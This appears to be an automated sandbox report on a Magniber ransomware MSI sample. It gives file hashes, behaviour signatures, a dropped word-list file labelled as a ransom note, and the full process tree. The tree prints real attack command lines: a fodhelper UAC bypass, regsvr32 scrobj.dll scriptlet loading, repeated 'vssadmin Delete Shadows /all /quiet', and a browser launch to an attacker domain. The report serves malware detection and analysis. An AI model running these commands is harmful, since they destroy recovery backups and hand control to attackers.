Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    14-09-2022 23:15

General

  • Target

    ddf798fa09f7c72f9fec4478841990d7.msi

  • Size

    92KB

  • MD5

    ddf798fa09f7c72f9fec4478841990d7

  • SHA1

    42b8bc580bd77c330432fb7cf6d9b8c8212961bd

  • SHA256

    b2b07b32c681a44c647814d09eeac5d691ae67ebf1862bd23c639fce7027685a

  • SHA512

    fa39bd42f000e8dffb4638a65cb08ab0f4393a7ed8ef718efa7f3652c00cd1aa31c6f3fb5365674700a08eb066d3e514e7f8131fce0bccd9b5897ea96c9b2425

  • SSDEEP

    768:8lUJ5BxTORGx4/dpZ6G+jzI/RyGwaW27N5MSdm4cyWMDC/yWMDCmYinj:hxTcdpZ6G//RzwaN1d00DU0D37n

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\3064_104092216\us_tv_and_film.txt

Ransom Note
you i to that it me what this know i'm no have my don't just not do be your we it's so but all well oh about right you're get here out going like yeah if can up want think that's now go him how got did why see come good really look will okay back can't mean tell i'll hey he's could didn't yes something because say take way little make need gonna never we're too she's i've sure our sorry what's let thing maybe down man very there's should anything said much any even off please doing thank give thought help talk god still wait find nothing again things let's doesn't call told great better ever night away believe feel everything you've fine last keep does put around stop they're i'd guy isn't always listen wanted guys huh those big lot happened thanks won't trying kind wrong talking guess care bad mom remember getting we'll together dad leave understand wouldn't actually hear baby nice father else stay done wasn't course might mind every enough try hell came someone you'll whole yourself idea ask must coming looking woman room knew tonight real son hope went hmm happy pretty saw girl sir friend already saying next job problem minute thinking haven't heard honey matter myself couldn't exactly having probably happen we've hurt boy dead gotta alone excuse start kill hard you'd today car ready without wants hold wanna yet seen deal once gone morning supposed friends head stuff worry live truth face forget true cause soon knows telling wife who's chance run move anyone person bye somebody heart miss making meet anyway phone reason damn lost looks bring case turn wish tomorrow kids trust check change anymore least aren't working makes taking means brother hate ago says beautiful gave fact crazy sit afraid important rest fun kid word watch glad everyone sister minutes everybody bit couple whoa either mrs feeling daughter wow gets asked break promise door close hand easy question tried far walk needs mine killed hospital anybody alright wedding shut able die perfect stand 
comes hit waiting dinner funny husband almost pay answer cool eyes news child shouldn't yours moment sleep read where's sounds sonny pick sometimes bed date plan hours lose hands serious shit behind inside ahead week wonderful fight past cut quite he'll sick it'll eat nobody goes save seems finally lives worried upset carly met brought seem sort safe weren't leaving front shot loved asking running clear figure hot felt parents drink absolutely how's daddy sweet alive sense meant happens bet blood ain't kidding lie meeting dear seeing sound fault ten buy hour speak lady jen thinks christmas outside hang possible worse mistake ooh handle spend totally giving here's marriage realize unless sex send needed scared picture talked ass hundred changed completely explain certainly sign boys relationship loves hair lying choice anywhere future weird luck she'll turned touch kiss crane questions obviously wonder pain calling somewhere throw straight cold fast words food none drive feelings they'll marry drop cannot dream protect twenty surprise sweetheart poor looked mad except gun y'know dance takes appreciate especially situation besides pull hasn't worth sheridan amazing expect swear piece busy happening movie we'd catch perhaps step fall watching kept darling dog honor moving till admit problems murder he'd evil definitely feels honest eye broke missed longer dollars tired evening starting entire trip niles suppose calm imagine fair caught blame sitting favor apartment terrible clean learn frasier relax accident wake prove smart message missing forgot interested table nbsp mouth pregnant ring careful shall dude ride figured wear shoot stick follow angry write stopped ran standing forgive jail wearing ladies kinda lunch cristian greenlee gotten hoping phoebe thousand ridge paper tough tape count boyfriend proud agree birthday they've share offer hurry feet wondering decision ones finish voice herself would've mess deserve evidence cute dress interesting hotel enjoy quiet 
concerned staying beat sweetie mention clothes fell neither mmm fix respect prison attention holding calls surprised bar keeping gift hadn't putting dark owe ice helping normal aunt lawyer apart plans jax girlfriend floor whether everything's box judge upstairs sake mommy possibly worst acting accept blow strange saved conversation plane mama yesterday lied quick lately stuck difference store she'd bought doubt listening walking cops deep dangerous buffy sleeping chloe rafe join card crime gentlemen willing window walked guilty likes fighting difficult soul joke favorite uncle promised bother seriously cell knowing broken advice somehow paid losing push helped killing boss liked innocent rules learned thirty risk letting speaking ridiculous afternoon apologize nervous charge patient boat how'd hide detective planning huge breakfast horrible awful pleasure driving hanging picked sell quit apparently dying notice congratulations visit could've c'mon letter decide forward fool showed smell seemed spell memory pictures slow seconds hungry hearing kitchen ma'am should've realized kick grab discuss fifty reading idiot suddenly agent destroy bucks shoes peace arms demon livvie consider papers incredible witch drunk attorney tells knock ways gives nose skye turns keeps jealous drug sooner cares plenty extra outta weekend matters gosh opportunity impossible waste pretend jump eating proof slept arrest breathe perfectly warm pulled twice easier goin dating suit romantic drugs comfortable finds checked divorce begin ourselves closer ruin smile laugh treat fear what'd otherwise excited mail hiding stole pacey noticed fired excellent bringing bottom note sudden bathroom honestly sing foot remind charges witness finding tree dare hardly that'll steal silly contact teach shop plus colonel fresh trial invited roll reach dirty choose emergency dropped butt credit obvious locked loving nuts agreed prue goodbye condition guard fuckin grow cake mood crap crying belong partner trick 
pressure dressed taste neck nurse raise lots carry whoever drinking they'd breaking file lock wine spot paying assume asleep turning viki bedroom shower nikolas camera fill reasons forty bigger nope breath doctors pants freak movies folks cream wild truly desk convince client threw hurts spending answers shirt chair rough doin sees ought empty wind aware dealing pack tight hurting guest arrested salem confused surgery expecting deacon unfortunately goddamn bottle beyond whenever pool opinion starts jerk secrets falling necessary barely dancing tests copy cousin ahem twelve tess skin fifteen speech orders complicated nowhere escape biggest restaurant grateful usual burn address someplace screw everywhere regret goodness mistakes details responsibility suspect corner hero dumb terrific whoo hole memories o'clock teeth ruined bite stenbeck liar showing cards desperate search pathetic spoke scare marah afford settle stayed checking hired heads concern blew alcazar champagne connection tickets happiness saving kissing hated personally suggest prepared onto downstairs ticket it'd loose holy duty convinced throwing kissed legs loud saturday babies where'd warning miracle carrying blind ugly shopping hates sight bride coat clearly celebrate brilliant wanting forrester lips custody screwed buying toast thoughts reality lexie attitude advantage grandfather sami grandma someday roof marrying powerful grown grandmother fake must've ideas exciting familiar bomb bout harmony schedule capable practically correct clue forgotten appointment deserves threat bloody lonely shame jacket hook scary investigation invite shooting lesson criminal victim funeral considering burning strength harder sisters pushed shock pushing heat chocolate miserable corinthos nightmare brings zander crash chances sending recognize healthy boring feed engaged headed treated knife drag badly hire paint pardon behavior closet warn gorgeous milk survive ends dump rent remembered thanksgiving rain revenge 
prefer spare pray disappeared aside statement sometime meat fantastic breathing laughing stood affair ours depends protecting jury brave fingers murdered explanation picking blah stronger handsome unbelievable anytime shake oakdale wherever pulling facts waited lousy circumstances disappointed weak trusted license nothin trash understanding slip sounded awake friendship stomach weapon threatened mystery vegas understood basically switch frankly cheap lifetime deny clock garbage why'd tear ears indeed changing singing tiny decent avoid messed filled touched disappear exact pills kicked harm fortune pretending insurance fancy drove cared belongs nights lorelai lift timing guarantee chest woke burned watched heading selfish drinks doll committed elevator freeze noise wasting ceremony uncomfortable staring files bike stress permission thrown possibility borrow fabulous doors screaming bone xander what're meal apology anger honeymoon bail parking fixed wash stolen sensitive stealing photo chose lets comfort worrying pocket mateo bleeding shoulder ignore talent tied garage dies demons dumped witches rude crack bothering radar soft meantime gimme kinds fate concentrate throat prom messages intend ashamed somethin manage guilt interrupt guts tongue shoe basement sentence purse glasses cabin universe repeat mirror wound travers tall engagement therapy emotional jeez decisions soup thrilled stake chef moves extremely moments expensive counting shots kidnapped cleaning shift plate impressed smells trapped aidan knocked charming attractive argue puts whip embarrassed package hitting bust stairs alarm pure nail nerve incredibly walks dirt stamp terribly friendly damned jobs suffering disgusting stopping deliver riding helps disaster bars crossed trap talks eggs chick threatening spoken introduce confession embarrassing bags impression gate reputation presents chat suffer argument talkin crowd homework coincidence cancel pride solve hopefully pounds pine mate illegal generous 
outfit maid bath punch freaked begging recall enjoying prepare wheel defend signs painful yourselves maris that'd suspicious cooking button warned sixty pity yelling awhile confidence offering pleased panic hers gettin refuse grandpa testify choices cruel mental gentleman coma cutting proteus guests expert benefit faces jumped toilet sneak halloween privacy smoking reminds twins swing solid options commitment crush ambulance wallet gang eleven option laundry assure stays skip fail discussion clinic betrayed sticking bored mansion soda sheriff suite handled busted load happier studying romance procedure commit assignment suicide minds swim yell llanview chasing proper believes humor hopes lawyers giant latest escaped parent tricks insist dropping cheer medication flesh routine sandwich handed false beating warrant awfully odds treating thin suggesting fever sweat silent clever sweater mall sharing assuming judgment goodnight divorced surely steps confess math listened comin answered vulnerable bless dreaming chip zero pissed nate kills tears knees chill brains unusual packed dreamed cure lookin grave cheating breaks locker gifts awkward thursday joking reasonable dozen curse quartermaine millions dessert rolling detail alien delicious closing vampires wore tail secure salad murderer spit offense dust conscience bread answering lame invitation grief smiling pregnancy prisoner delivery guards virus shrink freezing wreck massimo wire technically blown anxious cave holidays cleared wishes caring candles bound charm pulse jumping jokes boom occasion silence nonsense frightened slipped dimera blowing relationships kidnapping spin tool roxy packing blaming wrap obsessed fruit torture personality there'll fairy necessarily seventy print motel underwear grams exhausted believing freaking carefully trace touching messing recovery intention consequences belt sacrifice courage enjoyed attracted remove testimony intense heal defending unfair relieved loyal slowly buzz alcohol 
surprises psychiatrist plain attic who'd uniform terrified cleaned zach threaten fella enemies satisfied imagination hooked headache forgetting counselor andie acted badge naturally frozen sakes appropriate trunk dunno costume sixteen impressive kicking junk grabbed understands describe clients owns affect witnesses starving instincts happily discussing deserved strangers surveillance admire questioning dragged barn deeply wrapped wasted tense hoped fellas roommate mortal fascinating stops arrangements agenda literally propose honesty underneath sauce promises lecture eighty torn shocked backup differently ninety deck biological pheebs ease creep waitress telephone ripped raising scratch rings prints thee arguing ephram asks oops diner annoying taggert sergeant blast towel clown habit creature bermuda snap react paranoid handling eaten therapist comment sink reporter nurses beats priority interrupting warehouse loyalty inspector pleasant excuses threats guessing tend praying motive unconscious mysterious unhappy tone switched rappaport sookie neighbor loaded swore piss balance toss misery thief squeeze lobby goa'uld geez exercise forth booked sandburg poker eighteen d'you bury everyday digging creepy wondered liver hmmm magical fits discussed moral helpful searching flew depressed aisle cris amen vows neighbors darn cents arrange annulment useless adventure resist fourteen celebrating inch debt violent sand teal'c celebration reminded phones paperwork emotions stubborn pound tension stroke steady overnight chips beef suits boxes cassadine collect tragedy spoil realm wipe surgeon stretch stepped nephew neat limo confident perspective climb punishment finest springfield hint furniture blanket twist proceed fries worries niece gloves soap signature disappoint crawl convicted flip counsel doubts crimes accusing shaking remembering hallway halfway bothered madam gather cameras blackmail symptoms rope ordinary imagined cigarette supportive explosion trauma ouch furious 
cheat avoiding whew thick oooh boarding approve urgent shhh misunderstanding drawer phony interfere catching bargain tragic respond punish penthouse thou rach ohhh insult bugs beside begged absolute strictly socks senses sneaking reward polite checks tale physically instructions fooled blows tabby bitter adorable y'all tested suggestion jewelry alike jacks distracted s

Signatures

  • Detect magniber ransomware 2 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 3 IoCs
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 2 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 15 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2744
    • C:\Windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
      2⤵
      • Modifies registry class
      PID:1652
    • C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      PID:3904
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        PID:3556
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
          4⤵
          PID:1496
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:4280
    • C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      PID:5276
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        PID:5440
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
          4⤵
          PID:5572
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:5740
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2448
    • C:\Windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
      2⤵
      • Modifies registry class
      PID:4976
    • C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      PID:3672
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        PID:2756
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
          4⤵
          PID:1600
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:3240
    • C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      PID:5252
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        PID:5412
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
          4⤵
          PID:5552
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:5708
  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2408
    • C:\Windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
      2⤵
      • Modifies registry class
      PID:2656
    • C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      PID:4300
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        PID:2252
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
          4⤵
          PID:3568
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:2984
    • C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      PID:5260
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        PID:5400
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
          4⤵
          PID:5528
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:5672
  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\ddf798fa09f7c72f9fec4478841990d7.msi
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4888
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1952
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      PID:4264
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 0CB3A02F93E90B8853234F11696B31B8
      2⤵
      • Modifies extensions of user files
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Windows\System32\cmd.exe
        cmd /c "start microsoft-edge:http://48a8002834vpkrzajx.ridits.info/vpkrzajx^&1^&60119478^&75^&375^&2219041
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4468
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://48a8002834vpkrzajx.ridits.info/vpkrzajx&1&60119478&75&375&2219041
          4⤵
          • Adds Run key to start application
          • Enumerates system info in registry
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3064
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffad80d46f8,0x7ffad80d4708,0x7ffad80d4718
            5⤵
            PID:2184
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
            5⤵
            PID:528
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4260
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
            5⤵
            PID:1712
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
            5⤵
            PID:2008
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:1
            5⤵
            PID:1036
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5356 /prefetch:8
            5⤵
            PID:3792
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
            5⤵
            PID:388
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4340 /prefetch:1
            5⤵
            PID:1536
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5536 /prefetch:8
            5⤵
                                                                    PID:1052
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
                                                                    5⤵
                                                                      PID:4020
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
                                                                      5⤵
                                                                        PID:3044
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8
                                                                        5⤵
                                                                          PID:296
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                                                          5⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:3904
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff76bc35460,0x7ff76bc35470,0x7ff76bc35480
                                                                            6⤵
                                                                              PID:4644
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8
                                                                            5⤵
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:3560
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
                                                                            5⤵
                                                                              PID:5152
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2668 /prefetch:1
                                                                              5⤵
                                                                                PID:5936
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1872 /prefetch:8
                                                                                5⤵
                                                                                  PID:6032
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3128 /prefetch:8
                                                                                  5⤵
                                                                                    PID:6100
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4252 /prefetch:8
                                                                                    5⤵
                                                                                      PID:4468
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2004 /prefetch:8
                                                                                      5⤵
                                                                                        PID:3304
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3180 /prefetch:8
                                                                                        5⤵
                                                                                          PID:4068
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
                                                                                          5⤵
                                                                                            PID:5140
                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                    C:\Windows\system32\vssvc.exe
                                                                                    1⤵
                                                                                    • Checks SCSI registry key(s)
